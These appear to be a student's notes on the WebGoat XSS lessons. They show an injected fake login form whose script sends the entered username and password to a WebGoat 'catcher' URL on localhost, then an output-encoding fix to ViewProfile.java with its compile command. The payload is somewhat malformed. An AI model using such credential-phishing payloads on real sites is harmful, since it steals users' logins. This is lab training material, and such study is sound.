JavaScript- CrossSite Scripting

</form>
<form name="Test">
Username:<input type = "text" name="user"><br>
Password<input type = "password" name = "password">
<input type = "hidden" name= "PROPERTY" value="yes">
<input type = "submit" value= "login" onclick=<script><img src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user"+ document.phish.user.value +"&password=" +document.phish.pass.value + "">
</script>
</form>


Stage 4
Stage 4: Block Stored XSS using Output Encoding.
I modified this file
~/Desktop/apache-tomcat-7.0.69/webapps/WebGoat/WEB-INF/classes/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java
with these two statements
import org.owasp.webgoat.util.HtmlEncoder;
replacing answer_results.getString  with HtmlEncoder.encode("address1") 

I also compiled 
noellar@noellar-VirtualBox:~/Desktop/apache-tomcat-7.0.69/webapps/WebGoat/WEB-INF/classes$ sudo javac -classpath .:/home/noellar/Desktop/apache-tomcat-7.0.69/lib/catalina.jar:/home/noellar/Desktop/apache-tomcat-7.0.69/lib/servlet-api.jar org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java

